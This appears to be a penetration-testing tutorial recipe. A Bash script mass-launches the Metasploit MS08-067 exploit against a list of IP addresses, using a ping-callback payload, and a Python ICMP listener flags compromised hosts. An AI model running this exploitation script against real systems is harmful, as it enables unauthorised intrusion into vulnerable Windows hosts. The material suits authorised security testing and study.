How to do it...

The example that follows demonstrates how a Bash script can be used to exploit multiple instances of a single vulnerability simultaneously. This particular script exploits multiple instances of the MS08-067 NetAPI vulnerability by reading an input list of IP addresses, one per line, and launching a separate Metasploit console against each:

#!/bin/bash
# Launch one msfconsole per target. Each fires MS08-067 with a windows/exec
# payload that pings the attacking host once with TTL 15, which marks the
# traffic as exploit-generated for the listener below.

if [ -z "$1" ]; then echo "Usage: ./script <host file>"; exit 1; fi

iplist=$1
attacker=172.16.69.133   # host running the ICMP listener

while read -r ip; do
    [ -z "$ip" ] && continue
    # gnome-terminal -x runs the rest of the line as a command (newer
    # releases spell it "--"); msfconsole -x runs ';'-separated commands.
    gnome-terminal -x msfconsole -x \
        "use exploit/windows/smb/ms08_067_netapi; set RHOST $ip; set PAYLOAD windows/exec; set CMD cmd.exe /c ping $attacker -n 1 -i 15; run"
    echo "Exploiting $ip and pinging"
done < "$iplist"
  1. This script differs from the one discussed in the previous recipe only in its payload, which merely sends a single ICMP echo request from the exploited system back to the attacking system.
  2. The -i option of the Windows ping command sets the Time-To-Live (TTL) of the echo request, here to 15. Hosts normally send with a default TTL of 64, 128, or 255, so a request that arrives with a TTL of 15 or less is easily distinguished from ordinary ICMP traffic.
  3. A custom Python listener is run on the attacking system to identify exploited hosts by catching that ICMP traffic. The script is as follows:
#!/usr/bin/env python3
# ICMP callback listener: flags any host whose ICMP traffic to the attacking
# system arrives with a TTL of 15 or less (the marker set by "ping -i 15").
import logging
from scapy.all import sniff, IP, ICMP

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

ATTACKER_IP = "172.16.69.133"
MARKER_TTL = 15

def rules(pkt):
    # Called for every sniffed packet; only IP/ICMP packets are inspected.
    if IP in pkt and ICMP in pkt:
        if pkt[IP].dst == ATTACKER_IP and pkt[IP].ttl <= MARKER_TTL:
            print(pkt[IP].src + " is exploitable")

print("Listening for incoming ICMP traffic. Use Ctrl+C to stop scanning")
# prn is the per-packet callback (lfilter, used originally, expects a boolean
# filter function); the BPF filter keeps non-ICMP traffic out of Python.
sniff(filter="icmp", prn=rules, store=0)
  4. The listener inspects all incoming ICMP traffic. When a packet destined for the attacking system arrives with a TTL of 15 or lower, its source address is flagged as exploitable. Any ICMP type is accepted, so the TTL is the only discriminator; a host that is 50 or more hops away, or one whose default TTL has been lowered, could produce a false positive, though both are rare in practice.
  5. The Python listener must be started first. It prints "Listening for incoming ICMP traffic. Use Ctrl+C to stop scanning" and then nothing further until a marked packet arrives, and it should keep running for the duration of the exploitation process. Once it is running, launch the Bash exploitation script.
  6. When the Bash script runs, the original terminal reports each system being exploited and pinged, and a new GNOME terminal opens for each IP address in the input list. As each exploitation attempt completes, the ICMP echo request is sent from the target system.
  7. For each successful exploit, the listener sees the marked ICMP request and prints the source IP address of that traffic as exploitable.
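The following is an added example, not part of the original recipe or its scripts: the listener's decision logic rewritten without scapy, so the classification can be exercised offline against constructed datagrams. It keeps the recipe's attacker address (172.16.69.133) and TTL marker (15) but is stricter than the recipe's script in one respect: it only accepts ICMP echo requests (type 8), so echo replies to the attacker's own pings can never be flagged. The function names, the sample addresses and the packets built by build_icmp are all assumptions made for illustration.

```python
import socket
import struct
from typing import List, Optional

ATTACKER_IP = "172.16.69.133"   # listener address from the recipe
MARKER_TTL = 15                 # TTL the payload sets with "ping -i 15"
ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    total = (total >> 16) + (total & 0xFFFF)
    total += total >> 16
    return ~total & 0xFFFF


def classify_callback(raw: bytes, attacker_ip: str = ATTACKER_IP,
                      marker_ttl: int = MARKER_TTL) -> Optional[str]:
    """Return the source address if `raw` (an IPv4 datagram without link-layer
    header) is an ICMP echo request to attacker_ip that arrived with a TTL of
    marker_ttl or less; otherwise None."""
    if len(raw) < 20:
        return None
    (ver_ihl, _tos, _tlen, _ident, _frag, ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(raw) < ihl + 8:
        return None                      # not IPv4, or truncated
    if proto != socket.IPPROTO_ICMP:
        return None
    if socket.inet_ntoa(dst) != attacker_ip:
        return None
    if raw[ihl] != ICMP_ECHO_REQUEST:    # ICMP type is the first byte after the IP header
        return None
    if ttl > marker_ttl:
        return None                      # default TTLs (64/128/255) end up here
    return socket.inet_ntoa(src)


def exploited_hosts(datagrams: List[bytes]) -> List[str]:
    """Unique sources of marked callbacks, in the order first seen."""
    seen: List[str] = []
    for raw in datagrams:
        src = classify_callback(raw)
        if src is not None and src not in seen:
            seen.append(src)
    return seen


def build_icmp(src: str, dst: str, ttl: int, icmp_type: int = ICMP_ECHO_REQUEST,
               payload: bytes = b"a" * 32) -> bytes:
    """Constructed test datagram (hypothetical traffic, not a real capture)."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, 1, 1) + payload
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, ttl,
                     socket.IPPROTO_ICMP, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + icmp


def listen(attacker_ip: str = ATTACKER_IP, marker_ttl: int = MARKER_TTL) -> None:
    """Live listener (needs root). On Linux a raw IPPROTO_ICMP socket delivers
    each datagram with its IPv4 header, which is what classify_callback expects."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    print("Listening for incoming ICMP traffic. Use Ctrl+C to stop scanning")
    reported = set()
    while True:
        raw, _ = sock.recvfrom(65535)
        src = classify_callback(raw, attacker_ip, marker_ttl)
        if src and src not in reported:
            reported.add(src)
            print(src + " is exploitable")


if __name__ == "__main__":
    listen()
```

A callback from a target three hops away arrives with TTL 12 and is still accepted, while an ordinary Windows ping (TTL 128) or the attacker's own echo replies are ignored. The deduplication in exploited_hosts matters when a target is listed twice or a vulnerable service is hit repeatedly, which would otherwise print the same host more than once.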